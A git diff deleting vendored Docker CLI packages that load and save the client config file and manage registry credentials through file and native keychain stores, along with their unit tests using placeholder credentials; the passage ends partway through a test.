-}
-
-func TestLegacyJSONSaveWithNoFile(t *testing.T) {
-
-	js := `{"https://index.docker.io/v1/":{"auth":"am9lam9lOmhlbGxv","email":"user@example.com"}}`
-	config, err := LegacyLoadFromReader(strings.NewReader(js))
-	err = config.Save()
-	if err == nil {
-		t.Fatalf("Expected error. File should not have been able to save with no file name.")
-	}
-
-	tmpHome, err := ioutil.TempDir("", "config-test")
-	if err != nil {
-		t.Fatalf("Failed to create a temp dir: %q", err)
-	}
-	defer os.RemoveAll(tmpHome)
-
-	fn := filepath.Join(tmpHome, ConfigFileName)
-	f, _ := os.OpenFile(fn, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
-	defer f.Close()
-
-	if err = config.SaveToWriter(f); err != nil {
-		t.Fatalf("Failed saving to file: %q", err)
-	}
-	buf, err := ioutil.ReadFile(filepath.Join(tmpHome, ConfigFileName))
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	expConfStr := `{
-	"auths": {
-		"https://index.docker.io/v1/": {
-			"auth": "am9lam9lOmhlbGxv",
-			"email": "user@example.com"
-		}
-	}
-}`
-
-	if string(buf) != expConfStr {
-		t.Fatalf("Should have save in new form: \n%s\n not \n%s", string(buf), expConfStr)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file.go b/vendor/github.com/docker/docker/cliconfig/configfile/file.go
deleted file mode 100644
index 39097133a4..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/configfile/file.go
+++ /dev/null
@@ -1,183 +0,0 @@
-package configfile
-
-import (
-	"encoding/base64"
-	"encoding/json"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-)
-
-const (
-	// This constant is only used for really old config files when the
-	// URL wasn't saved as part of the config file and it was just
-	// assumed to be this value.
-	defaultIndexserver = "https://index.docker.io/v1/"
-)
-
-// ConfigFile ~/.docker/config.json file info
-type ConfigFile struct {
-	AuthConfigs          map[string]types.AuthConfig `json:"auths"`
-	HTTPHeaders          map[string]string           `json:"HttpHeaders,omitempty"`
-	PsFormat             string                      `json:"psFormat,omitempty"`
-	ImagesFormat         string                      `json:"imagesFormat,omitempty"`
-	NetworksFormat       string                      `json:"networksFormat,omitempty"`
-	VolumesFormat        string                      `json:"volumesFormat,omitempty"`
-	StatsFormat          string                      `json:"statsFormat,omitempty"`
-	DetachKeys           string                      `json:"detachKeys,omitempty"`
-	CredentialsStore     string                      `json:"credsStore,omitempty"`
-	CredentialHelpers    map[string]string           `json:"credHelpers,omitempty"`
-	Filename             string                      `json:"-"` // Note: for internal use only
-	ServiceInspectFormat string                      `json:"serviceInspectFormat,omitempty"`
-}
-
-// LegacyLoadFromReader reads the non-nested configuration data given and sets up the
-// auth config information with given directory and populates the receiver object
-func (configFile *ConfigFile) LegacyLoadFromReader(configData io.Reader) error {
-	b, err := ioutil.ReadAll(configData)
-	if err != nil {
-		return err
-	}
-
-	if err := json.Unmarshal(b, &configFile.AuthConfigs); err != nil {
-		arr := strings.Split(string(b), "\n")
-		if len(arr) < 2 {
-			return fmt.Errorf("The Auth config file is empty")
-		}
-		authConfig := types.AuthConfig{}
-		origAuth := strings.Split(arr[0], " = ")
-		if len(origAuth) != 2 {
-			return fmt.Errorf("Invalid Auth config file")
-		}
-		authConfig.Username, authConfig.Password, err = decodeAuth(origAuth[1])
-		if err != nil {
-			return err
-		}
-		authConfig.ServerAddress = defaultIndexserver
-		configFile.AuthConfigs[defaultIndexserver] = authConfig
-	} else {
-		for k, authConfig := range configFile.AuthConfigs {
-			authConfig.Username, authConfig.Password, err = decodeAuth(authConfig.Auth)
-			if err != nil {
-				return err
-			}
-			authConfig.Auth = ""
-			authConfig.ServerAddress = k
-			configFile.AuthConfigs[k] = authConfig
-		}
-	}
-	return nil
-}
-
-// LoadFromReader reads the configuration data given and sets up the auth config
-// information with given directory and populates the receiver object
-func (configFile *ConfigFile) LoadFromReader(configData io.Reader) error {
-	if err := json.NewDecoder(configData).Decode(&configFile); err != nil {
-		return err
-	}
-	var err error
-	for addr, ac := range configFile.AuthConfigs {
-		ac.Username, ac.Password, err = decodeAuth(ac.Auth)
-		if err != nil {
-			return err
-		}
-		ac.Auth = ""
-		ac.ServerAddress = addr
-		configFile.AuthConfigs[addr] = ac
-	}
-	return nil
-}
-
-// ContainsAuth returns whether there is authentication configured
-// in this file or not.
-func (configFile *ConfigFile) ContainsAuth() bool {
-	return configFile.CredentialsStore != "" ||
-		len(configFile.CredentialHelpers) > 0 ||
-		len(configFile.AuthConfigs) > 0
-}
-
-// SaveToWriter encodes and writes out all the authorization information to
-// the given writer
-func (configFile *ConfigFile) SaveToWriter(writer io.Writer) error {
-	// Encode sensitive data into a new/temp struct
-	tmpAuthConfigs := make(map[string]types.AuthConfig, len(configFile.AuthConfigs))
-	for k, authConfig := range configFile.AuthConfigs {
-		authCopy := authConfig
-		// encode and save the authstring, while blanking out the original fields
-		authCopy.Auth = encodeAuth(&authCopy)
-		authCopy.Username = ""
-		authCopy.Password = ""
-		authCopy.ServerAddress = ""
-		tmpAuthConfigs[k] = authCopy
-	}
-
-	saveAuthConfigs := configFile.AuthConfigs
-	configFile.AuthConfigs = tmpAuthConfigs
-	defer func() { configFile.AuthConfigs = saveAuthConfigs }()
-
-	data, err := json.MarshalIndent(configFile, "", "\t")
-	if err != nil {
-		return err
-	}
-	_, err = writer.Write(data)
-	return err
-}
-
-// Save encodes and writes out all the authorization information
-func (configFile *ConfigFile) Save() error {
-	if configFile.Filename == "" {
-		return fmt.Errorf("Can't save config with empty filename")
-	}
-
-	if err := os.MkdirAll(filepath.Dir(configFile.Filename), 0700); err != nil {
-		return err
-	}
-	f, err := os.OpenFile(configFile.Filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
-	if err != nil {
-		return err
-	}
-	defer f.Close()
-	return configFile.SaveToWriter(f)
-}
-
-// encodeAuth creates a base64 encoded string to containing authorization information
-func encodeAuth(authConfig *types.AuthConfig) string {
-	if authConfig.Username == "" && authConfig.Password == "" {
-		return ""
-	}
-
-	authStr := authConfig.Username + ":" + authConfig.Password
-	msg := []byte(authStr)
-	encoded := make([]byte, base64.StdEncoding.EncodedLen(len(msg)))
-	base64.StdEncoding.Encode(encoded, msg)
-	return string(encoded)
-}
-
-// decodeAuth decodes a base64 encoded string and returns username and password
-func decodeAuth(authStr string) (string, string, error) {
-	if authStr == "" {
-		return "", "", nil
-	}
-
-	decLen := base64.StdEncoding.DecodedLen(len(authStr))
-	decoded := make([]byte, decLen)
-	authByte := []byte(authStr)
-	n, err := base64.StdEncoding.Decode(decoded, authByte)
-	if err != nil {
-		return "", "", err
-	}
-	if n > decLen {
-		return "", "", fmt.Errorf("Something went wrong decoding auth config")
-	}
-	arr := strings.SplitN(string(decoded), ":", 2)
-	if len(arr) != 2 {
-		return "", "", fmt.Errorf("Invalid auth configuration file")
-	}
-	password := strings.Trim(arr[1], "\x00")
-	return arr[0], password, nil
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go b/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
deleted file mode 100644
index 435797f681..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/configfile/file_test.go
+++ /dev/null
@@ -1,27 +0,0 @@
-package configfile
-
-import (
-	"testing"
-
-	"github.com/docker/docker/api/types"
-)
-
-func TestEncodeAuth(t *testing.T) {
-	newAuthConfig := &types.AuthConfig{Username: "ken", Password: "test"}
-	authStr := encodeAuth(newAuthConfig)
-	decAuthConfig := &types.AuthConfig{}
-	var err error
-	decAuthConfig.Username, decAuthConfig.Password, err = decodeAuth(authStr)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if newAuthConfig.Username != decAuthConfig.Username {
-		t.Fatal("Encode Username doesn't match decoded Username")
-	}
-	if newAuthConfig.Password != decAuthConfig.Password {
-		t.Fatal("Encode Password doesn't match decoded Password")
-	}
-	if authStr != "a2VuOnRlc3Q=" {
-		t.Fatal("AuthString encoding isn't correct.")
-	}
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go b/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
deleted file mode 100644
index ca874cac51..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/credentials.go
+++ /dev/null
@@ -1,17 +0,0 @@
-package credentials
-
-import (
-	"github.com/docker/docker/api/types"
-)
-
-// Store is the interface that any credentials store must implement.
-type Store interface {
-	// Erase removes credentials from the store for a given server.
-	Erase(serverAddress string) error
-	// Get retrieves credentials from the store for a given server.
-	Get(serverAddress string) (types.AuthConfig, error)
-	// GetAll retrieves all the credentials from the store.
-	GetAll() (map[string]types.AuthConfig, error)
-	// Store saves credentials in the store.
-	Store(authConfig types.AuthConfig) error
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
deleted file mode 100644
index b4733709b1..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store.go
+++ /dev/null
@@ -1,22 +0,0 @@
-package credentials
-
-import (
-	"os/exec"
-
-	"github.com/docker/docker/cliconfig/configfile"
-)
-
-// DetectDefaultStore sets the default credentials store
-// if the host includes the default store helper program.
-func DetectDefaultStore(c *configfile.ConfigFile) {
-	if c.CredentialsStore != "" {
-		// user defined
-		return
-	}
-
-	if defaultCredentialsStore != "" {
-		if _, err := exec.LookPath(remoteCredentialsPrefix + defaultCredentialsStore); err == nil {
-			c.CredentialsStore = defaultCredentialsStore
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
deleted file mode 100644
index 63e8ed4010..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_darwin.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package credentials
-
-const defaultCredentialsStore = "osxkeychain"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
deleted file mode 100644
index 864c540f6c..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_linux.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package credentials
-
-const defaultCredentialsStore = "secretservice"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
deleted file mode 100644
index 519ef53dcd..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_unsupported.go
+++ /dev/null
@@ -1,5 +0,0 @@
-// +build !windows,!darwin,!linux
-
-package credentials
-
-const defaultCredentialsStore = ""
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go b/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
deleted file mode 100644
index fb6a9745cf..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/default_store_windows.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package credentials
-
-const defaultCredentialsStore = "wincred"
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
deleted file mode 100644
index ca73a384d4..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store.go
+++ /dev/null
@@ -1,53 +0,0 @@
-package credentials
-
-import (
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cliconfig/configfile"
-	"github.com/docker/docker/registry"
-)
-
-// fileStore implements a credentials store using
-// the docker configuration file to keep the credentials in plain text.
-type fileStore struct {
-	file *configfile.ConfigFile
-}
-
-// NewFileStore creates a new file credentials store.
-func NewFileStore(file *configfile.ConfigFile) Store {
-	return &fileStore{
-		file: file,
-	}
-}
-
-// Erase removes the given credentials from the file store.
-func (c *fileStore) Erase(serverAddress string) error {
-	delete(c.file.AuthConfigs, serverAddress)
-	return c.file.Save()
-}
-
-// Get retrieves credentials for a specific server from the file store.
-func (c *fileStore) Get(serverAddress string) (types.AuthConfig, error) {
-	authConfig, ok := c.file.AuthConfigs[serverAddress]
-	if !ok {
-		// Maybe they have a legacy config file, we will iterate the keys converting
-		// them to the new format and testing
-		for r, ac := range c.file.AuthConfigs {
-			if serverAddress == registry.ConvertToHostname(r) {
-				return ac, nil
-			}
-		}
-
-		authConfig = types.AuthConfig{}
-	}
-	return authConfig, nil
-}
-
-func (c *fileStore) GetAll() (map[string]types.AuthConfig, error) {
-	return c.file.AuthConfigs, nil
-}
-
-// Store saves the given credentials in the file store.
-func (c *fileStore) Store(authConfig types.AuthConfig) error {
-	c.file.AuthConfigs[authConfig.ServerAddress] = authConfig
-	return c.file.Save()
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
deleted file mode 100644
index efed4e9040..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/file_store_test.go
+++ /dev/null
@@ -1,139 +0,0 @@
-package credentials
-
-import (
-	"io/ioutil"
-	"testing"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/cliconfig/configfile"
-)
-
-func newConfigFile(auths map[string]types.AuthConfig) *configfile.ConfigFile {
-	tmp, _ := ioutil.TempFile("", "docker-test")
-	name := tmp.Name()
-	tmp.Close()
-
-	c := cliconfig.NewConfigFile(name)
-	c.AuthConfigs = auths
-	return c
-}
-
-func TestFileStoreAddCredentials(t *testing.T) {
-	f := newConfigFile(make(map[string]types.AuthConfig))
-
-	s := NewFileStore(f)
-	err := s.Store(types.AuthConfig{
-		Auth:          "super_secret_token",
-		Email:         "foo@example.com",
-		ServerAddress: "https://example.com",
-	})
-
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(f.AuthConfigs) != 1 {
-		t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs))
-	}
-
-	a, ok := f.AuthConfigs["https://example.com"]
-	if !ok {
-		t.Fatalf("expected auth for https://example.com, got %v", f.AuthConfigs)
-	}
-	if a.Auth != "super_secret_token" {
-		t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth)
-	}
-	if a.Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
-	}
-}
-
-func TestFileStoreGet(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		"https://example.com": {
-			Auth:          "super_secret_token",
-			Email:         "foo@example.com",
-			ServerAddress: "https://example.com",
-		},
-	})
-
-	s := NewFileStore(f)
-	a, err := s.Get("https://example.com")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if a.Auth != "super_secret_token" {
-		t.Fatalf("expected auth `super_secret_token`, got %s", a.Auth)
-	}
-	if a.Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
-	}
-}
-
-func TestFileStoreGetAll(t *testing.T) {
-	s1 := "https://example.com"
-	s2 := "https://example2.com"
-	f := newConfigFile(map[string]types.AuthConfig{
-		s1: {
-			Auth:          "super_secret_token",
-			Email:         "foo@example.com",
-			ServerAddress: "https://example.com",
-		},
-		s2: {
-			Auth:          "super_secret_token2",
-			Email:         "foo@example2.com",
-			ServerAddress: "https://example2.com",
-		},
-	})
-
-	s := NewFileStore(f)
-	as, err := s.GetAll()
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(as) != 2 {
-		t.Fatalf("wanted 2, got %d", len(as))
-	}
-	if as[s1].Auth != "super_secret_token" {
-		t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth)
-	}
-	if as[s1].Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email)
-	}
-	if as[s2].Auth != "super_secret_token2" {
-		t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth)
-	}
-	if as[s2].Email != "foo@example2.com" {
-		t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email)
-	}
-}
-
-func TestFileStoreErase(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		"https://example.com": {
-			Auth:          "super_secret_token",
-			Email:         "foo@example.com",
-			ServerAddress: "https://example.com",
-		},
-	})
-
-	s := NewFileStore(f)
-	err := s.Erase("https://example.com")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	// file store never returns errors, check that the auth config is empty
-	a, err := s.Get("https://example.com")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if a.Auth != "" {
-		t.Fatalf("expected empty auth token, got %s", a.Auth)
-	}
-	if a.Email != "" {
-		t.Fatalf("expected empty email, got %s", a.Email)
-	}
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
deleted file mode 100644
index dec2dbcb82..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go
+++ /dev/null
@@ -1,144 +0,0 @@
-package credentials
-
-import (
-	"github.com/docker/docker-credential-helpers/client"
-	"github.com/docker/docker-credential-helpers/credentials"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cliconfig/configfile"
-)
-
-const (
-	remoteCredentialsPrefix = "docker-credential-"
-	tokenUsername           = "<token>"
-)
-
-// nativeStore implements a credentials store
-// using native keychain to keep credentials secure.
-// It piggybacks into a file store to keep users' emails.
-type nativeStore struct {
-	programFunc client.ProgramFunc
-	fileStore   Store
-}
-
-// NewNativeStore creates a new native store that
-// uses a remote helper program to manage credentials.
-func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store {
-	name := remoteCredentialsPrefix + helperSuffix
-	return &nativeStore{
-		programFunc: client.NewShellProgramFunc(name),
-		fileStore:   NewFileStore(file),
-	}
-}
-
-// Erase removes the given credentials from the native store.
-func (c *nativeStore) Erase(serverAddress string) error {
-	if err := client.Erase(c.programFunc, serverAddress); err != nil {
-		return err
-	}
-
-	// Fallback to plain text store to remove email
-	return c.fileStore.Erase(serverAddress)
-}
-
-// Get retrieves credentials for a specific server from the native store.
-func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) {
-	// load user email if it exist or an empty auth config.
-	auth, _ := c.fileStore.Get(serverAddress)
-
-	creds, err := c.getCredentialsFromStore(serverAddress)
-	if err != nil {
-		return auth, err
-	}
-	auth.Username = creds.Username
-	auth.IdentityToken = creds.IdentityToken
-	auth.Password = creds.Password
-
-	return auth, nil
-}
-
-// GetAll retrieves all the credentials from the native store.
-func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) {
-	auths, err := c.listCredentialsInStore()
-	if err != nil {
-		return nil, err
-	}
-
-	// Emails are only stored in the file store.
-	// This call can be safely eliminated when emails are removed.
-	fileConfigs, _ := c.fileStore.GetAll()
-
-	authConfigs := make(map[string]types.AuthConfig)
-	for registry := range auths {
-		creds, err := c.getCredentialsFromStore(registry)
-		if err != nil {
-			return nil, err
-		}
-		ac, _ := fileConfigs[registry] // might contain Email
-		ac.Username = creds.Username
-		ac.Password = creds.Password
-		ac.IdentityToken = creds.IdentityToken
-		authConfigs[registry] = ac
-	}
-
-	return authConfigs, nil
-}
-
-// Store saves the given credentials in the file store.
-func (c *nativeStore) Store(authConfig types.AuthConfig) error {
-	if err := c.storeCredentialsInStore(authConfig); err != nil {
-		return err
-	}
-	authConfig.Username = ""
-	authConfig.Password = ""
-	authConfig.IdentityToken = ""
-
-	// Fallback to old credential in plain text to save only the email
-	return c.fileStore.Store(authConfig)
-}
-
-// storeCredentialsInStore executes the command to store the credentials in the native store.
-func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error {
-	creds := &credentials.Credentials{
-		ServerURL: config.ServerAddress,
-		Username:  config.Username,
-		Secret:    config.Password,
-	}
-
-	if config.IdentityToken != "" {
-		creds.Username = tokenUsername
-		creds.Secret = config.IdentityToken
-	}
-
-	return client.Store(c.programFunc, creds)
-}
-
-// getCredentialsFromStore executes the command to get the credentials from the native store.
-func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) {
-	var ret types.AuthConfig
-
-	creds, err := client.Get(c.programFunc, serverAddress)
-	if err != nil {
-		if credentials.IsErrCredentialsNotFound(err) {
-			// do not return an error if the credentials are not
-			// in the keyckain. Let docker ask for new credentials.
-			return ret, nil
-		}
-		return ret, err
-	}
-
-	if creds.Username == tokenUsername {
-		ret.IdentityToken = creds.Secret
-	} else {
-		ret.Password = creds.Secret
-		ret.Username = creds.Username
-	}
-
-	ret.ServerAddress = serverAddress
-	return ret, nil
-}
-
-// listCredentialsInStore returns a listing of stored credentials as a map of
-// URL -> username.
-func (c *nativeStore) listCredentialsInStore() (map[string]string, error) {
-	return client.List(c.programFunc)
-}
diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
deleted file mode 100644
index 7664faf9e1..0000000000
--- a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go
+++ /dev/null
@@ -1,355 +0,0 @@
-package credentials
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker-credential-helpers/client"
-	"github.com/docker/docker-credential-helpers/credentials"
-	"github.com/docker/docker/api/types"
-)
-
-const (
-	validServerAddress   = "https://index.docker.io/v1"
-	validServerAddress2  = "https://example.com:5002"
-	invalidServerAddress = "https://foobar.example.com"
-	missingCredsAddress  = "https://missing.docker.io/v1"
-)
-
-var errCommandExited = fmt.Errorf("exited 1")
-
-// mockCommand simulates interactions between the docker client and a remote
-// credentials helper.
-// Unit tests inject this mocked command into the remote to control execution.
-type mockCommand struct {
-	arg   string
-	input io.Reader
-}
-
-// Output returns responses from the remote credentials helper.
-// It mocks those responses based in the input in the mock.
-func (m *mockCommand) Output() ([]byte, error) {
-	in, err := ioutil.ReadAll(m.input)
-	if err != nil {
-		return nil, err
-	}
-	inS := string(in)
-
-	switch m.arg {
-	case "erase":
-		switch inS {
-		case validServerAddress:
-			return nil, nil
-		default:
-			return []byte("program failed"), errCommandExited
-		}
-	case "get":
-		switch inS {
-		case validServerAddress:
-			return []byte(`{"Username": "foo", "Secret": "bar"}`), nil
-		case validServerAddress2:
-			return []byte(`{"Username": "<token>", "Secret": "abcd1234"}`), nil
-		case missingCredsAddress:
-			return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited
-		case invalidServerAddress:
-			return []byte("program failed"), errCommandExited
-		}
-	case "store":
-		var c credentials.Credentials
-		err := json.NewDecoder(strings.NewReader(inS)).Decode(&c)
-		if err != nil {
-			return []byte("program failed"), errCommandExited
-		}
-		switch c.ServerURL {
-		case validServerAddress:
-			return nil, nil
-		default:
-			return []byte("program failed"), errCommandExited
-		}
-	case "list":
-		return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "<token>")), nil
-	}
-
-	return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited
-}
-
-// Input sets the input to send to a remote credentials helper.
-func (m *mockCommand) Input(in io.Reader) {
-	m.input = in
-}
-
-func mockCommandFn(args ...string) client.Program {
-	return &mockCommand{
-		arg: args[0],
-	}
-}
-
-func TestNativeStoreAddCredentials(t *testing.T) {
-	f := newConfigFile(make(map[string]types.AuthConfig))
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	err := s.Store(types.AuthConfig{
-		Username:      "foo",
-		Password:      "bar",
-		Email:         "foo@example.com",
-		ServerAddress: validServerAddress,
-	})
-
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(f.AuthConfigs) != 1 {
-		t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs))
-	}
-
-	a, ok := f.AuthConfigs[validServerAddress]
-	if !ok {
-		t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs)
-	}
-	if a.Auth != "" {
-		t.Fatalf("expected auth to be empty, got %s", a.Auth)
-	}
-	if a.Username != "" {
-		t.Fatalf("expected username to be empty, got %s", a.Username)
-	}
-	if a.Password != "" {
-		t.Fatalf("expected password to be empty, got %s", a.Password)
-	}
-	if a.IdentityToken != "" {
-		t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken)
-	}
-	if a.Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
-	}
-}
-
-func TestNativeStoreAddInvalidCredentials(t *testing.T) {
-	f := newConfigFile(make(map[string]types.AuthConfig))
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	err := s.Store(types.AuthConfig{
-		Username:      "foo",
-		Password:      "bar",
-		Email:         "foo@example.com",
-		ServerAddress: invalidServerAddress,
-	})
-
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-
-	if !strings.Contains(err.Error(), "program failed") {
-		t.Fatalf("expected `program failed`, got %v", err)
-	}
-
-	if len(f.AuthConfigs) != 0 {
-		t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs))
-	}
-}
-
-func TestNativeStoreGet(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	a, err := s.Get(validServerAddress)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if a.Username != "foo" {
-		t.Fatalf("expected username `foo`, got %s", a.Username)
-	}
-	if a.Password != "bar" {
-		t.Fatalf("expected password `bar`, got %s", a.Password)
-	}
-	if a.IdentityToken != "" {
-		t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken)
-	}
-	if a.Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com`, got %s", a.Email)
-	}
-}
-
-func TestNativeStoreGetIdentityToken(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress2: {
-			Email: "foo@example2.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	a, err := s.Get(validServerAddress2)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if a.Username != "" {
-		t.Fatalf("expected username to be empty, got %s", a.Username)
-	}
-	if a.Password != "" {
-		t.Fatalf("expected password to be empty, got %s", a.Password)
-	}
-	if a.IdentityToken != "abcd1234" {
-		t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken)
-	}
-	if a.Email != "foo@example2.com" {
-		t.Fatalf("expected email `foo@example2.com`, got %s", a.Email)
-	}
-}
-
-func TestNativeStoreGetAll(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	as, err := s.GetAll()
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(as) != 2 {
-		t.Fatalf("wanted 2, got %d", len(as))
-	}
-
-	if as[validServerAddress].Username != "foo" {
-		t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, as[validServerAddress].Username)
-	}
-	if as[validServerAddress].Password != "bar" {
-		t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password)
-	}
-	if as[validServerAddress].IdentityToken != "" {
-		t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken)
-	}
-	if as[validServerAddress].Email != "foo@example.com" {
-		t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email)
-	}
-	if as[validServerAddress2].Username != "" {
-		t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username)
-	}
-	if as[validServerAddress2].Password != "" {
-		t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password)
-	}
-	if as[validServerAddress2].IdentityToken != "abcd1234" {
-		t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken)
-	}
-	if as[validServerAddress2].Email != "" {
-		t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email)
-	}
-}
-
-func TestNativeStoreGetMissingCredentials(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	_, err := s.Get(missingCredsAddress)
-	if err != nil {
-		// missing credentials do not produce an error
-		t.Fatal(err)
-	}
-}
-
-func TestNativeStoreGetInvalidAddress(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
-		fileStore:   NewFileStore(f),
-	}
-	_, err := s.Get(invalidServerAddress)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-
-	if !strings.Contains(err.Error(), "program failed") {
-		t.Fatalf("expected `program failed`, got %v", err)
-	}
-}
-
-func TestNativeStoreErase(t *testing.T) {
-	f := newConfigFile(map[string]types.AuthConfig{
-		validServerAddress: {
-			Email: "foo@example.com",
-		},
-	})
-	f.CredentialsStore = "mock"
-
-	s := &nativeStore{
-		programFunc: mockCommandFn,
